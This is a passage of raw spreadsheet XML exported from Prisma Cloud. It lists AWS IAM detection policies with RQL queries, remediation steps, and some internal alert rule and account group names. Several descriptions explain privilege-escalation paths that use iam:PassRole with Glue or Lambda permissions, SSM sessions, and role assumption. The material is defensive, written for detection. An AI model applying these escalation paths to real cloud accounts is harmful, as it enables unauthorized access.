          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3120" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3120" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3120" t="inlineStr"/>
      <c r="R3120" t="inlineStr"/>
      <c r="S3120" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3120" t="b">
        <v>1</v>
      </c>
      <c r="U3120" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3120" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3120" t="inlineStr">
        <is>
          <t>With access to the iam:PassRole and glue:CreateJob permissions, an adversary can create a new Glue job and pass in a more privileged role. This would allow an adversary to escalate privileges to the more privileged role.</t>
        </is>
      </c>
      <c r="X3120" t="inlineStr">
        <is>
          <t>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2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0" t="inlineStr">
        <is>
          <t>config from iam where action.name CONTAINS ALL ( 'iam:PassRole', 'glue:CreateJob' ) AND dest.cloud.wildcardscope = true and grantedby.cloud.policy.condition ('iam:PassedToService') does not exist and source.cloud.resource.id DOES NOT END WITH ':root'</t>
        </is>
      </c>
      <c r="AA3120" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3120" t="inlineStr">
        <is>
          <t>2023-12-08 03:58:20</t>
        </is>
      </c>
      <c r="AC3120" t="inlineStr"/>
      <c r="AD3120" t="b">
        <v>1</v>
      </c>
      <c r="AE3120" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3120" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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0" t="inlineStr">
        <is>
          <t>de6c3f8f-6235-4c9f-be5e-93dc842d6066</t>
        </is>
      </c>
      <c r="AI3120" t="inlineStr">
        <is>
          <t>de6c3f8f-6235-4c9f-be5e-93dc842d6066</t>
        </is>
      </c>
      <c r="AJ3120" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3120" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3121">
      <c r="A3121" t="inlineStr"/>
      <c r="B3121" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3121" s="2" t="inlineStr"/>
      <c r="D3121" t="n">
        <v>0</v>
      </c>
      <c r="E3121" t="n">
        <v>124</v>
      </c>
      <c r="F3121" t="n">
        <v>0</v>
      </c>
      <c r="G3121" t="b">
        <v>1</v>
      </c>
      <c r="H31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1" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3121" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3121" t="inlineStr">
        <is>
          <t>AWS IAM policy allows Privilege escalation via PassRole &amp; Lambda create &amp; invoke Function permissions</t>
        </is>
      </c>
      <c r="L3121" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3121" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3121" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3121" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3121" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3121" t="inlineStr"/>
      <c r="R3121" t="inlineStr"/>
      <c r="S3121" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3121" t="b">
        <v>1</v>
      </c>
      <c r="U3121" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3121" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3121" t="inlineStr">
        <is>
          <t>With access to the iam:PassRole, lambda:CreateFunction, and lambda:InvokeFunction permissions, an adversary can create a new Lambda function and pass a more privileged existing role to it. They can then invoke the function allowing them access to the privileges of the role associated with the function. This would allow an adversary to escalate privileges to the more privileged role.</t>
        </is>
      </c>
      <c r="X3121" t="inlineStr">
        <is>
          <t>"Do not use wildcards in a policy's statement Resource element with these permissions, as it creates a risk of Privilege Escalation. If identity requires the use of these permissions to pass a role to a Lambda function, make sure the policy is scoped to only the resources needed. See the following example: https://aws.amazon.com/premiumsupport/knowledge-center/granular-access-lambda/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12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1" t="inlineStr">
        <is>
          <t>config from iam where action.name CONTAINS ALL ( 'iam:PassRole', 'lambda:InvokeFunction', 'lambda:CreateFunction') AND dest.cloud.wildcardscope = true and grantedby.cloud.policy.condition ('iam:PassedToService') does not exist and source.cloud.resource.id DOES NOT END WITH ':root'</t>
        </is>
      </c>
      <c r="AA3121" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3121" t="inlineStr">
        <is>
          <t>2023-12-08 03:58:20</t>
        </is>
      </c>
      <c r="AC3121" t="inlineStr"/>
      <c r="AD3121" t="b">
        <v>1</v>
      </c>
      <c r="AE3121" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3121" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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1" t="inlineStr">
        <is>
          <t>83886acc-ec72-4898-8b1e-e19ab8b7afa8</t>
        </is>
      </c>
      <c r="AI3121" t="inlineStr">
        <is>
          <t>83886acc-ec72-4898-8b1e-e19ab8b7afa8</t>
        </is>
      </c>
      <c r="AJ3121" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3121" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3122">
      <c r="A3122" t="inlineStr"/>
      <c r="B3122" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3122" s="2" t="inlineStr"/>
      <c r="D3122" t="n">
        <v>0</v>
      </c>
      <c r="E3122" t="n">
        <v>121</v>
      </c>
      <c r="F3122" t="n">
        <v>0</v>
      </c>
      <c r="G3122" t="b">
        <v>1</v>
      </c>
      <c r="H31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2" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3122" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3122" t="inlineStr">
        <is>
          <t>AWS IAM policy allows Privilege escalation via PassRole &amp; Glue development endpoint permissions</t>
        </is>
      </c>
      <c r="L3122" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3122" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3122" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3122" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3122" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3122" t="inlineStr"/>
      <c r="R3122" t="inlineStr"/>
      <c r="S3122" t="inlineStr"/>
      <c r="T3122" t="b">
        <v>1</v>
      </c>
      <c r="U3122" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3122" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3122" t="inlineStr">
        <is>
          <t>With access to the iam:PassRole and glue:CreateDevEndpoint permissions, an adversary can create a new Glue development endpoint and pass in a more privileged role. This would allow an adversary to escalate privileges to the more privileged role.</t>
        </is>
      </c>
      <c r="X3122"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2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2" t="inlineStr">
        <is>
          <t>config from iam where action.name CONTAINS ALL ( 'iam:PassRole', 'glue:CreateDevEndpoint', 'glue:GetDevEndpoint') AND dest.cloud.wildcardscope = true and grantedby.cloud.policy.condition ('iam:PassedToService') does not exist and source.cloud.resource.id DOES NOT END WITH ':root'</t>
        </is>
      </c>
      <c r="AA3122" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3122" t="inlineStr">
        <is>
          <t>2023-12-08 03:58:20</t>
        </is>
      </c>
      <c r="AC3122" t="inlineStr"/>
      <c r="AD3122" t="b">
        <v>1</v>
      </c>
      <c r="AE3122" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3122" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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2" t="inlineStr">
        <is>
          <t>f0b8cc40-ace4-4c77-823e-4738cd6a3e13</t>
        </is>
      </c>
      <c r="AI3122" t="inlineStr">
        <is>
          <t>f0b8cc40-ace4-4c77-823e-4738cd6a3e13</t>
        </is>
      </c>
      <c r="AJ3122" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3122" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3123">
      <c r="A3123" t="inlineStr"/>
      <c r="B3123" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3123" s="2" t="inlineStr"/>
      <c r="D3123" t="n">
        <v>4190</v>
      </c>
      <c r="E3123" t="n">
        <v>12</v>
      </c>
      <c r="F3123" t="n">
        <v>0</v>
      </c>
      <c r="G3123" t="b">
        <v>1</v>
      </c>
      <c r="H3123"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NH-TestAlert, NH-test, New Azure Subscription Created, New DNS record alert route 53, PCS - Basic Alert Rule, PCS Demo  - Prisma Cloud XSOAR Filter, PCS Demo Compute Alert Test, Ports open to the internet, Random v2, Ranti-Jira-Alert-rule, Ranti-rule-xsoar, RantiAlertRule-3, RaviAlert rule, Stella test, TEST, TEST ALERT THING FOR ADAM SCRIPT,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3" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3123" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3123" t="inlineStr">
        <is>
          <t>AWS EC2 Instance with IAM write permissions</t>
        </is>
      </c>
      <c r="L3123" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3123" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3123" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3123" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3123" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3123" t="inlineStr"/>
      <c r="R3123" t="inlineStr"/>
      <c r="S3123" t="inlineStr">
        <is>
          <t>Attack Path Rule,Prisma_Cloud</t>
        </is>
      </c>
      <c r="T3123" t="b">
        <v>1</v>
      </c>
      <c r="U3123" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3123" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3123" t="inlineStr">
        <is>
          <t>This policy identifies IAM permissions that allow EC2 instances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123"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2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3"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'ec2' AND source.cloud.resource.type = 'instance'</t>
        </is>
      </c>
      <c r="AA3123" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3123" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3123" t="inlineStr"/>
      <c r="AD3123" t="b">
        <v>1</v>
      </c>
      <c r="AE3123" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3123" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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NH-TestAlert - Notifications:, AccountGroups:avega-active-directory,Default Account Group,loblaw-ag,Pramm-XSIAM,Test_Praveen_Webinar2,Matt's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NH-test - Notifications:jira, AccountGroups:avega-active-directory,Default Account Group,loblaw-ag,Pramm-XSIAM,Test_Praveen_Webinar2,jojo-test,jleech-cloud-labs,undukwo_Account,Juan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 ALERT THING FOR ADAM SCRIPT - Notifications:email, AccountGroups:compute-zw-rbac;,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3" t="inlineStr">
        <is>
          <t>8bef368e-7b79-4828-a9cd-f4aa4fa8a3ce</t>
        </is>
      </c>
      <c r="AI3123" t="inlineStr">
        <is>
          <t>8bef368e-7b79-4828-a9cd-f4aa4fa8a3ce</t>
        </is>
      </c>
      <c r="AJ3123" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3123" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3124">
      <c r="A3124" t="inlineStr"/>
      <c r="B3124" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3124" s="2" t="inlineStr"/>
      <c r="D3124" t="n">
        <v>0</v>
      </c>
      <c r="E3124" t="n">
        <v>1</v>
      </c>
      <c r="F3124" t="n">
        <v>0</v>
      </c>
      <c r="G3124" t="b">
        <v>1</v>
      </c>
      <c r="H31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4" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3124" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3124" t="inlineStr">
        <is>
          <t>AWS SNS Topic is Publicly Accessible Through Resource-Based Policies</t>
        </is>
      </c>
      <c r="L3124" t="inlineStr">
        <is>
          <t>UNAUTHORIZED_ACCESS</t>
        </is>
      </c>
      <c r="M3124" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3124" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3124" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3124" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3124" t="inlineStr"/>
      <c r="R3124" t="inlineStr"/>
      <c r="S3124" t="inlineStr"/>
      <c r="T3124" t="b">
        <v>0</v>
      </c>
      <c r="U3124" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3124" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3124" t="inlineStr">
        <is>
          <t>This policy identifies AWS SNS Topics with Resource-based policies which allow all principals. This configuration creates a risk of sensitive information exposure.</t>
        </is>
      </c>
      <c r="X3124" t="inlineStr">
        <is>
          <t>Remediation steps:
1. Log in to the AWS console
2. Navigate to the AWS SNS Topicservice
3. Find resource-based policy of the AWS SNS Topic resource
4. Update the 'Principal' section of the policy to avoid public access</t>
        </is>
      </c>
      <c r="Y3124" t="inlineStr"/>
      <c r="Z3124" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' and source.public = true AND dest.cloud.service.name = 'sns' AND dest.cloud.resource.type = 'topic' AND grantedby.cloud.policy.condition does not exist</t>
        </is>
      </c>
      <c r="AA3124" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3124" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3124" t="inlineStr"/>
      <c r="AD3124" t="b">
        <v>1</v>
      </c>
      <c r="AE3124" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3124" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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4" t="inlineStr">
        <is>
          <t>815bd09f-8b4c-4bba-bc25-8ac4cad31355</t>
        </is>
      </c>
      <c r="AI3124" t="inlineStr">
        <is>
          <t>815bd09f-8b4c-4bba-bc25-8ac4cad31355</t>
        </is>
      </c>
      <c r="AJ3124" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3124" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3125">
      <c r="A3125" t="inlineStr"/>
      <c r="B3125" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3125" s="2" t="inlineStr"/>
      <c r="D3125" t="inlineStr"/>
      <c r="E3125" t="inlineStr"/>
      <c r="F3125" t="inlineStr"/>
      <c r="G3125" t="b">
        <v>1</v>
      </c>
      <c r="H31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5" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3125" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3125" t="inlineStr">
        <is>
          <t>Publicly Writable Lambda</t>
        </is>
      </c>
      <c r="L3125" t="inlineStr">
        <is>
          <t>INTERNET_EXPOSURE</t>
        </is>
      </c>
      <c r="M3125" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3125" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3125" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3125" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3125" t="inlineStr"/>
      <c r="R3125" t="inlineStr"/>
      <c r="S3125" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3125" t="b">
        <v>1</v>
      </c>
      <c r="U3125" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3125" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3125" t="inlineStr">
        <is>
          <t>Detects Lambda functions configured to allow unauthorized identities to modify the function's code or configuration settings</t>
        </is>
      </c>
      <c r="X3125" t="inlineStr">
        <is>
          <t>Remediation steps:
Via Console:
1. Log in to your AWS account
2. Navigate to the Lambda function
3. Under the 'Configuration' tab, select 'Permissions'
4. Under 'Resource-based policy statements' edit the resource policy to only allow required parties to modify the function
Via CLI:
1. Log into your AWS account
2. Run 'aws lambda get-policy --function-name &lt;function arn&gt;' in order to get the statement-id for your current resource policy
3. Run 'aws lambda remove-permission' with the required arguments in order to remove the resource policy
4. Run 'aws lambda add-permission' to specify a new resource policy only allowing required parties to modify the function</t>
        </is>
      </c>
      <c r="Y312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5" t="inlineStr">
        <is>
          <t>config from iam where dest.cloud.type = 'AWS' and source.public = true AND dest.cloud.service.name = 'lambda' AND action.name in ('lambda:DeleteFunctionUrlConfig', 'lambda:UpdateFunctionUrlConfig','lambda:UpdateFunctionCode','lambda:UpdateFunctionConfiguration','lambda:PutFunctionEventInvokeConfig','lambda:UpdateFunctionEventInvokeConfig') and grantedby.cloud.policy.type = 'Resource-based Policy' and dest.cloud.resource.type = 'function' AND grantedby.cloud.policy.condition ( 'lambda:FunctionUrlAuthType' ) != 'AWS_IAM' AND grantedby.cloud.policy.condition ( 'lambda:FunctionArn' ) does not exist AND grantedby.cloud.policy.condition ( 'lambda:Layer' ) does not exist AND grantedby.cloud.policy.condition ( 'lambda:VpcIds' ) does not exist AND grantedby.cloud.policy.condition ( 'lambda:SubnetIds' ) does not exist AND grantedby.cloud.policy.condition ( 'lambda:SecurityGroupIds' ) does not exist</t>
        </is>
      </c>
      <c r="AA3125" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3125" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3125" t="inlineStr"/>
      <c r="AD3125" t="b">
        <v>1</v>
      </c>
      <c r="AE3125" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3125" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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5" t="inlineStr">
        <is>
          <t>ff06a8d6-a8dc-47de-bf42-d107f702ba4f</t>
        </is>
      </c>
      <c r="AI3125" t="inlineStr">
        <is>
          <t>ff06a8d6-a8dc-47de-bf42-d107f702ba4f</t>
        </is>
      </c>
      <c r="AJ3125" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3125" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3126">
      <c r="A3126" t="inlineStr"/>
      <c r="B3126" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3126" s="2" t="inlineStr"/>
      <c r="D3126" t="inlineStr"/>
      <c r="E3126" t="inlineStr"/>
      <c r="F3126" t="inlineStr"/>
      <c r="G3126" t="b">
        <v>1</v>
      </c>
      <c r="H31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26" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3126" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3126" t="inlineStr">
        <is>
          <t>Unprivileged user can assume a Service Account with admin privileges</t>
        </is>
      </c>
      <c r="L3126" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3126" t="inlineStr">
        <is>
          <t>low</t>
        </is>
      </c>
      <c r="N3126" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3126" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3126" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3126" t="inlineStr"/>
      <c r="R3126" t="inlineStr"/>
      <c r="S3126" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3126" t="b">
        <v>1</v>
      </c>
      <c r="U3126" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3126" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3126" t="inlineStr">
        <is>
          <t>Identifies unprivileged (not administrator) users which can assume service accounts with administrative permissions. This offers adversaries opportunities to escalate their privileges, thereby expanding the potential blast radius of a breach.</t>
        </is>
      </c>
      <c r="X3126" t="inlineStr">
        <is>
          <t>How to investigate?
1. In the Prisma Cloud Console, under the "Alerts" tab, select the "Alert ID", then "Investigate"
2. In the results, you will see the user ("Source") and the role attached to it ("Granted By Entity"). The administrative role will be shown as the "Destination". In cases where the source role ("Granted By Entity") and privileged role ("Destination") permissions are granted in different accounts, "Source" may contain administrative permissions for its original account.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312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6" t="inlineStr">
        <is>
          <t>config from iam where source.cloud.type = 'AWS' AND source.cloud.resource.type = 'User' AND source.cloud.resource.isadministrative = false AND dest.cloud.resource.type = 'role' AND action.name = 'sts:AssumeRole' AND dest.cloud.resource.isadministrative = true</t>
        </is>
      </c>
      <c r="AA3126" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3126" t="inlineStr">
        <is>
          <t>2024-11-11 04:28:29</t>
        </is>
      </c>
      <c r="AC3126" t="inlineStr"/>
      <c r="AD3126" t="b">
        <v>1</v>
      </c>
      <c r="AE3126" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3126" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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26" t="inlineStr">
        <is>
          <t>632bcea7-6ad8-4ca3-8e20-5b0ab49da01b</t>
        </is>
      </c>
      <c r="AI3126" t="inlineStr">
        <is>
          <t>632bcea7-6ad8-4ca3-8e20-5b0ab49da01b</t>
        </is>
      </c>
      <c r="AJ3126" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3126" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3127">
      <c r="A3127" t="inlineStr"/>
      <c r="B3127" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3127" s="2" t="inlineStr"/>
      <c r="D3127" t="n">
        <v>2</v>
      </c>
      <c r="E3127" t="n">
        <v>0</v>
      </c>
      <c r="F3127" t="n">
        <v>0</v>
      </c>
      <c r="G3127" t="b">
        <v>1</v>
      </c>
      <c r="H31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7" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3127" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3127" t="inlineStr">
        <is>
          <t>AWS ECS Task Definition with AWS Organization management permissions</t>
        </is>
      </c>
      <c r="L3127" t="inlineStr">
        <is>
          <t>HIGH_PRIVILEGED_ROLE</t>
        </is>
      </c>
      <c r="M3127" t="inlineStr">
        <is>
          <t>high</t>
        </is>
      </c>
      <c r="N3127" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3127" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3127" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3127" t="inlineStr"/>
      <c r="R3127" t="inlineStr"/>
      <c r="S3127" t="inlineStr"/>
      <c r="T3127" t="b">
        <v>1</v>
      </c>
      <c r="U3127" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3127" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3127" t="inlineStr">
        <is>
          <t>This policy identifies IAM permissions that allow ECS task definitions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127" t="inlineStr">
        <is>
          <t>Remediation steps:
1. Login to the Okta console
2. Find the role used by the Okta user
3. Log in to the AWS console
4. Navigate to the IAM service
5. Click on Roles
6. Choose the relevant role
7. Under ''Permissions policies'', find the relevant policy according to the alert details and remove the risky actions</t>
        </is>
      </c>
      <c r="Y312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7"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source.cloud.service.name = 'ecs' and source.cloud.resource.type = 'task-definition'</t>
        </is>
      </c>
      <c r="AA3127" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3127" t="inlineStr">
        <is>
          <t>2024-11-11 03:56:37</t>
        </is>
      </c>
      <c r="AC3127" t="inlineStr"/>
      <c r="AD3127" t="b">
        <v>1</v>
      </c>
      <c r="AE3127" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3127" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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7" t="inlineStr">
        <is>
          <t>18f6902b-1358-48b4-b81e-528072b30656</t>
        </is>
      </c>
      <c r="AI3127" t="inlineStr">
        <is>
          <t>18f6902b-1358-48b4-b81e-528072b30656</t>
        </is>
      </c>
      <c r="AJ3127" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3127" t="inlineStr">
        <is>
          <t>Discovered 2024/11/19/15:02</t>
        </is>
      </c>
    </row>
    <row r="3128">
      <c r="A3128" t="inlineStr"/>
      <c r="B3128" s="2" t="inlineStr">
        <is>
          <t>NO_SUPPORT</t>
        </is>
      </c>
      <c r="C3128" s="2" t="inlineStr"/>
      <c r="D3128" t="n">
        <v>0</v>
      </c>
      <c r="E3128" t="n">
        <v>175</v>
      </c>
      <c r="F3128" t="n">
        <v>0</v>
      </c>
      <c r="G3128" t="b">
        <v>1</v>
      </c>
      <c r="H31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8" t="inlineStr">
        <is>
          <t>aws</t>
        </is>
      </c>
      <c r="J3128" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="K3128" t="inlineStr">
        <is>
          <t>AWS IAM policy allows Privilege escalation via EC2 describe and SSM session permissions</t>
        </is>
      </c>
      <c r="L3128" t="inlineStr">
        <is>
          <t>PRIVILEGE_ESCALATION</t>
        </is>
      </c>
      <c r="M3128" t="inlineStr">
        <is>
          <t>medium</t>
        </is>
      </c>
      <c r="N3128" t="inlineStr">
        <is>
          <t>Prisma Cloud</t>
        </is>
      </c>
      <c r="O3128" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="P3128" t="inlineStr">
        <is>
          <t>permissions</t>
        </is>
      </c>
      <c r="Q3128" t="inlineStr"/>
      <c r="R3128" t="inlineStr"/>
      <c r="S3128" t="inlineStr">
        <is>
          <t>Attack Path Rule</t>
        </is>
      </c>
      <c r="T3128" t="b">
        <v>1</v>
      </c>
      <c r="U3128" t="inlineStr">
        <is>
          <t>exposure</t>
        </is>
      </c>
      <c r="V3128" t="inlineStr">
        <is>
          <t>iam</t>
        </is>
      </c>
      <c r="W3128" t="inlineStr">
        <is>
          <t>With access to the ec2:DescribeInstances, ssm:StartSession, ssm:DescribeSessions, ssm:GetConnectionStatus, ssm:DescribeInstanceProperties, ssm:TerminateSession, ssm:ResumeSession permissions, an adversary can potentially connect on any instance that supports SSM.  This could allow an adversary to escalate privileges if they find an instance that has a highly privileged IAM role attached to it.</t>
        </is>
      </c>
      <c r="X3128" t="inlineStr">
        <is>
          <t>"Do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2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8" t="inlineStr">
        <is>
          <t>config from iam where action.name CONTAINS ALL ( 'ec2:DescribeInstances', 'ssm:StartSession', 'ssm:DescribeSessions', 'ssm:GetConnectionStatus', 'ssm:DescribeInstanceProperties', 'ssm:TerminateSession', 'ssm:ResumeSession' ) AND dest.cloud.wildcardscope = true</t>
        </is>
      </c>
      <c r="AA3128" t="inlineStr">
        <is>
          <t>Prisma Cloud System Admin</t>
        </is>
      </c>
      <c r="AB3128" t="inlineStr">
        <is>
          <t>2023-08-21 06:18:36</t>
        </is>
      </c>
      <c r="AC3128" t="inlineStr"/>
      <c r="AD3128" t="b">
        <v>1</v>
      </c>
      <c r="AE3128" t="inlineStr">
        <is>
          <t>redlock_default</t>
        </is>
      </c>
      <c r="AF3128" t="inlineStr">
        <is>
          <t>risk</t>
        </is>
      </c>
      <c r="AG31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8" t="inlineStr">
        <is>
          <t>e174e94b-bc56-44a5-b1e8-5ad30e8cf039</t>
        </is>
      </c>
      <c r="AI3128" t="inlineStr">
        <is>
          <t>e174e94b-bc56-44a5-b1e8-5ad30e8cf039</t>
        </is>
      </c>
      <c r="AJ3128" t="inlineStr">
        <is>
          <t>true</t>
        </is>
      </c>
      <c r="AK3128" t="inlineStr">
        <is>
